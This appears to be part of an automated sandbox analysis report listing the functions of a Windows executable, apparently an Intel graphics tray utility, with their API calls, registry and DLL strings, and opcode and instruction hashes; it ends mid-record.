WriteFile.KERNEL32 ref: 00411AB8

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: b219a8b0579a93511e93f213679f898353d398c72b2e0e8dbf6a9e58bbf9f176
Instruction ID: 5b5bbbeb8a4f72624648a7e6630cac66a6d33518b46e8415182f941ed1988bf9
Opcode Fuzzy Hash: b219a8b0579a93511e93f213679f898353d398c72b2e0e8dbf6a9e58bbf9f176
Instruction Fuzzy Hash: 4B51CEB6228AC481CB208F25E4447AE7BA1F785BC8F48511AEB9A47765DF3CD485C70C

Function 00402C30 Relevance: 1.6, APIs: 1, Instructions: 102comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00402C91

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 653debe0929baa30350ef2096d78e3456961cd861a0e182f0b389787ccd1b2c3
Instruction ID: 04a552c0cef79d736518f21ba58439141f8a8dad175f93b59262968296a72252
Opcode Fuzzy Hash: 653debe0929baa30350ef2096d78e3456961cd861a0e182f0b389787ccd1b2c3
Instruction Fuzzy Hash: D2418C36329A8482DB119F26E548B6E7360FB84F98F144123EE4E47BA4DF7CC945CB05

Function 00409A90 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00409B21

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 6069188bf80103d095e280d03e3dda5b7bbd6567f67e4ce63c8184befd8b4a71
Instruction ID: 2005a01f3e63bd9e88dfe05ddcd02d2f7aa35568b9214490b66f9c5e468de2eb
Opcode Fuzzy Hash: 6069188bf80103d095e280d03e3dda5b7bbd6567f67e4ce63c8184befd8b4a71
Instruction Fuzzy Hash: 28316732604B94C2CB20DF1AF48052AB775F785BA4B5A8116EF9D63B59CB3DE811CB08

Function 00410E10 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 00410E35

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4ea874cbe54bdc6a7fd8ac8255c3f53a6f922a3eee54bc48f5fb48a156366ab
Instruction ID: f167002c483cd1ab1ec9226d20e297c060999b50dd8ebb5e14fe52a84513159e
Opcode Fuzzy Hash: d4ea874cbe54bdc6a7fd8ac8255c3f53a6f922a3eee54bc48f5fb48a156366ab
Instruction Fuzzy Hash: EEE065B660868091D630AB15F8013DA6721F7D475CF800316EA9C47775DE2CC685CB04

Function 00401DA8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00401DDD

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: f605b65a0d0b013b55ac5d11b38c1177b870d4a1fdda075608e77fd078a87978
Instruction ID: 359d89820b72a1f088dcb750a7ce86251fd3ae28a76d944d0e7bfeb65593818a
Opcode Fuzzy Hash: f605b65a0d0b013b55ac5d11b38c1177b870d4a1fdda075608e77fd078a87978
Instruction Fuzzy Hash: 88E0EDBA625684C6E730EB12F84179AB360F7D8748F80421AEA8D53755DF3CC549CF14

Function 0040FE20 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040FE2B

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b6f0cfddd511a8643534f0afa1992affdcaf78fc116b126665ea1a03cfb0368d
Instruction ID: cd00d9839f8b0aceb16f9879b0f5ae5fcb9be01b0cd5fef243716e15033be290
Opcode Fuzzy Hash: b6f0cfddd511a8643534f0afa1992affdcaf78fc116b126665ea1a03cfb0368d
Instruction Fuzzy Hash: 8FC09B74761901D1D604DB51FC4538122A47754350FC14431C70E81721FB3C81DF8704

Function 00412300 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1161b38846514c612381d6720662742a8d14dfda9f349b5f1dcaa9f1c4060631
Instruction ID: 41a2ce4f8f15f19b6f253b56dfb955397478f04eef7839a20e65853bb6be75d0
Opcode Fuzzy Hash: 1161b38846514c612381d6720662742a8d14dfda9f349b5f1dcaa9f1c4060631
Instruction Fuzzy Hash: EC61BE73614694CBD718CF38D690799BBA1F388B48B58D02AEB4ACB748D77CC890CB54

Function 00410AE0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8233905307250eda29294feef1bfbd4237195ca5e6a2bce8ae326429be2880d4
Instruction ID: 657abddec93a64cd17d06e468523f1ddb157634f3603537454be526a14013e15
Opcode Fuzzy Hash: 8233905307250eda29294feef1bfbd4237195ca5e6a2bce8ae326429be2880d4
Instruction Fuzzy Hash: F1312AB2A2978087D744CF65E5406AEB7A1F385744F60A127FB8947B08DB3CC191CF04

Function 00409F90 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c0ecd9236b2dfd3b0b439b729d0558f6f5689e27783ec658b4c6433c597ab9
Instruction ID: 1aed4fcc2f6099dac8afec52c830f25b5d7854f3901ae154afaa511e3a1c85ba
Opcode Fuzzy Hash: b5c0ecd9236b2dfd3b0b439b729d0558f6f5689e27783ec658b4c6433c597ab9
Instruction Fuzzy Hash: 7B41BF73700B89C6CB20CF28D48065EB764F785B98F558223DB6963794DB3AC865CB05

Function 0040FE40 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b136c78c7884ebcaa03b512936b40df84d96ef2b5efa296fec4e04c7609fc5
Instruction ID: 8382111e1065706471bf0717aaf963163efa2cf19283c7367d088da9a4158963
Opcode Fuzzy Hash: f5b136c78c7884ebcaa03b512936b40df84d96ef2b5efa296fec4e04c7609fc5
Instruction Fuzzy Hash: 42A002B1284C00E0EA848B01F8503912334F7807C0F024021DA0E414628F3CC4C58208

Function 0040E830 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 333COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,UnregServer,0040A52A), ref: 0040E8A8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,UnregServer,0040A52A), ref: 0040E8C8
MultiByteToWideChar.KERNEL32 ref: 0040E989
MultiByteToWideChar.KERNEL32 ref: 0040EA36
LCMapStringW.KERNEL32 ref: 0040EA59
LCMapStringW.KERNEL32 ref: 0040EAA8

Strings

UnregServer, xrefs: 0040E842

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID: UnregServer
API String ID: 1775797328-1225568973
Opcode ID: 2023b37bcb058761a960b91979d23d9122293c873615f066b3a59ed4c25ffffa
Instruction ID: 32cd5edb2318ce294e457cc8d2ccace4f11b59fbfcdc3b67281511a55048ec20
Opcode Fuzzy Hash: 2023b37bcb058761a960b91979d23d9122293c873615f066b3a59ed4c25ffffa
Instruction Fuzzy Hash: 76D1A3722047808ED734CF26E84039A77A5FB487D8F14463AEA4E67B98DB3CDA55C748

Function 00411F20 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,0040F0E5,?,?,?,0041163E), ref: 00411F5C
GetProcAddress.KERNEL32(?,0040F0E5,?,?,?,0041163E), ref: 00411F78
GetProcAddress.KERNEL32(?,0040F0E5,?,?,?,0041163E), ref: 00411F94
GetProcAddress.KERNEL32(?,0040F0E5,?,?,?,0041163E), ref: 00411FAB
GetProcAddress.KERNEL32(?,0040F0E5,?,?,?,0041163E), ref: 00411FCB
GetProcAddress.KERNEL32(?,0040F0E5,?,?,?,0041163E), ref: 00411FE7

Strings

user32.dll, xrefs: 00411F55
GetActiveWindow, xrefs: 00411F8A
GetProcessWindowStation, xrefs: 00411FDD
GetLastActivePopup, xrefs: 00411F9A
GetUserObjectInformationA, xrefs: 00411FC1
MessageBoxA, xrefs: 00411F6E

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
API String ID: 2238633743-1612076079
Opcode ID: 8f6c7d340e79a67c102386bdb5120686d4488504657ec0dda8a3317cd5f9b33d
Instruction ID: 8e3e37c2d6791a169298e674d3d4c249d414f6c63dda3350c15ada24dd171b79
Opcode Fuzzy Hash: 8f6c7d340e79a67c102386bdb5120686d4488504657ec0dda8a3317cd5f9b33d
Instruction Fuzzy Hash: 854129B1209B4185EE10DB11F9503DA77A5BB48BC0F88412ADB4D83B68EFBCD1DAC708

Function 00406740 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 138windowcomtimeCOMMON

Download Yara Rule

APIs

KillTimer.USER32 ref: 00406770

Part of subcall function 004066F4: DestroyMenu.USER32(?,?,?,00000000,00406F5A), ref: 00406707

CreatePopupMenu.USER32 ref: 004067FA
AppendMenuA.USER32 ref: 0040682C
CLSIDFromProgID.OLE32 ref: 0040684B
CoCreateInstance.OLE32 ref: 00406871
DestroyWindow.USER32 ref: 004068F8
SetForegroundWindow.USER32 ref: 0040690F
GetCursorPos.USER32 ref: 0040691A
TrackPopupMenu.USER32 ref: 00406949
DestroyMenu.USER32 ref: 0040695A

Strings

igfxpph.GraphicsShellExt, xrefs: 00406844

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Menu$Destroy$CreatePopupWindow$AppendCursorForegroundFromInstanceKillProgTimerTrack
String ID: igfxpph.GraphicsShellExt
API String ID: 2768693305-3156075121
Opcode ID: 7b5c729213fcdffcdaa978e9352edea70dd52fbf0da3ed359821f8ea9520e13d
Instruction ID: f592d64ddb6e0a87329a7c3ce0a7d8dc43e8cb5f0d22d996558460d0ca96404f
Opcode Fuzzy Hash: 7b5c729213fcdffcdaa978e9352edea70dd52fbf0da3ed359821f8ea9520e13d
Instruction Fuzzy Hash: 7A6106BA200F5582EB10DF1AE8403997366F784F84F624526DF5E47BA4DF39C896C748

Function 00406FD8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00407059
RegQueryValueExA.ADVAPI32 ref: 004070AB
RegCloseKey.ADVAPI32 ref: 004070C6
RegOpenKeyExA.ADVAPI32 ref: 004070EA
RegQueryValueExA.ADVAPI32 ref: 00407125
RegSetValueExA.ADVAPI32 ref: 0040714E
RegCloseKey.ADVAPI32 ref: 00407159

Strings

SOFTWARE\Intel\Display\igfxcui\igfxtray\TrayIcon, xrefs: 00406FF6, 004070D1
ShowTrayIcon, xrefs: 00407071, 00407116

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Value$CloseQuery$CreateOpen
String ID: SOFTWARE\Intel\Display\igfxcui\igfxtray\TrayIcon$ShowTrayIcon
API String ID: 649853243-3654495232
Opcode ID: c4ae7a25ac475f3ce483bd494eeb09590e4b267b94a3e684f1d85f5d7856718e
Instruction ID: 6fa64ad7c4cde23dab06ea34195798820aebfcf6f08848d96393cc172aaca976
Opcode Fuzzy Hash: c4ae7a25ac475f3ce483bd494eeb09590e4b267b94a3e684f1d85f5d7856718e
Instruction Fuzzy Hash: 5241FDB2308A81C6DB20CF10F89479AB7A4F788798F414226DB9D47B98DF7DC589CB44

Function 0040F8C0 Relevance: 15.1, APIs: 10, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0040F8DD
GetLastError.KERNEL32 ref: 0040F8F7
GetEnvironmentStringsW.KERNEL32 ref: 0040F920
WideCharToMultiByte.KERNEL32 ref: 0040F986
WideCharToMultiByte.KERNEL32 ref: 0040F9C1
FreeEnvironmentStringsW.KERNEL32 ref: 0040F9D9
FreeEnvironmentStringsW.KERNEL32 ref: 0040FA03
GetEnvironmentStrings.KERNEL32 ref: 0040FA16
FreeEnvironmentStringsA.KERNEL32 ref: 0040FA5A
FreeEnvironmentStringsA.KERNEL32 ref: 0040FA87

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 4109468225-0
Opcode ID: 74b96260ef9868c2040b2e4a3097b7d51119ce3b8208ddf06d217168c80ebf50
Instruction ID: 1f46dfd8f7b19879db01a5e74b164934b9bdcab5038885aff2d5eb54ec85dcd4
Opcode Fuzzy Hash: 74b96260ef9868c2040b2e4a3097b7d51119ce3b8208ddf06d217168c80ebf50
Instruction Fuzzy Hash: 044161B170578086DB209F22B94435AA7A5F789BD4F494036DF8E63F98DB7CD489CB08

Function 00403608 Relevance: 15.1, APIs: 10, Instructions: 122memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00403649
CoTaskMemAlloc.OLE32 ref: 0040365A
CharNextA.USER32 ref: 0040368C
CoTaskMemFree.OLE32 ref: 004036BC
CoTaskMemFree.OLE32 ref: 00403799

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Task$Free$AllocCharNextlstrlen
String ID:
API String ID: 3110935603-0
Opcode ID: ef2b84b9aaa87087a15dba67993a7b219cb8eafb9e02f6941aa890dde071a73c
Instruction ID: 10b20b8b2839aaf923fc1b777ef127f5bf9fa33b96416cb5ce99d2e5c4e2694a
Opcode Fuzzy Hash: ef2b84b9aaa87087a15dba67993a7b219cb8eafb9e02f6941aa890dde071a73c
Instruction Fuzzy Hash: 904104F6205B4191EF209F11E95436A3BA4AB98B86F048437CF4E97795EF7CCA94C708

Function 00408FB0 Relevance: 15.1, APIs: 10, Instructions: 106stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00408FDE
MultiByteToWideChar.KERNEL32 ref: 00409001
GetLastError.KERNEL32 ref: 00409010
GetLastError.KERNEL32 ref: 0040901A

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWidelstrlen
String ID:
API String ID: 475730466-0
Opcode ID: ea76d9030cb52701dad294b5fe4e670909ced96b5a09558d3f6548f36d719bbe
Instruction ID: 590136d7d0da23cf76ad0edfcc439377adbfe4b44c7f64c652e7887506e77757
Opcode Fuzzy Hash: ea76d9030cb52701dad294b5fe4e670909ced96b5a09558d3f6548f36d719bbe
Instruction Fuzzy Hash: 2A41E831704B4585D714AF7298053AA33A5F7487D8F09493AEA8AA77D5DF3CC891C318

Function 00402A1C Relevance: 13.6, APIs: 9, Instructions: 95registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00402A6D
RegCloseKey.ADVAPI32 ref: 00402A83
RegCloseKey.ADVAPI32 ref: 00402AA5
RegEnumKeyExA.ADVAPI32 ref: 00402AEB
RegEnumKeyExA.ADVAPI32 ref: 00402B48
RegCloseKey.ADVAPI32 ref: 00402B5E
RegCloseKey.ADVAPI32 ref: 00402B72
RegDeleteKeyA.ADVAPI32 ref: 00402B87
RegCloseKey.ADVAPI32 ref: 00402B99

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Close$Enum$DeleteOpen
String ID:
API String ID: 3743465055-0
Opcode ID: 3539b937dcdcb1ff3c34f132d6ea68dc394ed2e2ea7c64409142ab49815a8c14
Instruction ID: 9769bb4481ab30ae15909df3e7cbd2a0a876e26e8357d577559f5c51bc4eca5e
Opcode Fuzzy Hash: 3539b937dcdcb1ff3c34f132d6ea68dc394ed2e2ea7c64409142ab49815a8c14
Instruction Fuzzy Hash: E0410C36215B8182EB20CF55F45839AB770FB88798F504126EB8E83B98DFBDC549CB04

Function 004020F0 Relevance: 12.1, APIs: 8, Instructions: 88memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00402124
lstrlenW.KERNEL32 ref: 00402131
CoTaskMemAlloc.OLE32 ref: 0040213E
CoTaskMemAlloc.OLE32 ref: 0040214B
CoTaskMemFree.OLE32 ref: 004021AB
CoTaskMemFree.OLE32 ref: 004021B5
CoTaskMemFree.OLE32 ref: 004021F0
CoTaskMemFree.OLE32 ref: 004021FA

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Task$Free$Alloclstrlen
String ID:
API String ID: 745325408-0
Opcode ID: 440f013eeed2fe0adcc976a00037283cce8f72fba779bad7a074ba7a0bbde1fa
Instruction ID: 33e5d7a2b649b8ca686138f0e2162ce66e4c90c9de1fce339543462047048723
Opcode Fuzzy Hash: 440f013eeed2fe0adcc976a00037283cce8f72fba779bad7a074ba7a0bbde1fa
Instruction Fuzzy Hash: 25319A76200A809ADB14AF22EC447AA7720F788BD9F06C426DF5A5B794DF3CC581C308

Function 00412D10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

__shl_12.LIBCMT ref: 00412FA5
__shr_12.LIBCMT ref: 00412FC5
__shl_12.LIBCMT ref: 00412FFB
__shl_12.LIBCMT ref: 00413005
__shl_12.LIBCMT ref: 0041301E

Strings

?, xrefs: 00412D96

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: __shl_12$__shr_12
String ID: ?
API String ID: 4261834660-1684325040
Opcode ID: 0c61b0cadc11a5e6ad29c17a25000195560c1b24c1bd8b55352b8583462699ca
Instruction ID: 9d232308901a27c796e680b049c941b239a10825e76cdf5a15c3f6bd3bc9fd19
Opcode Fuzzy Hash: 0c61b0cadc11a5e6ad29c17a25000195560c1b24c1bd8b55352b8583462699ca
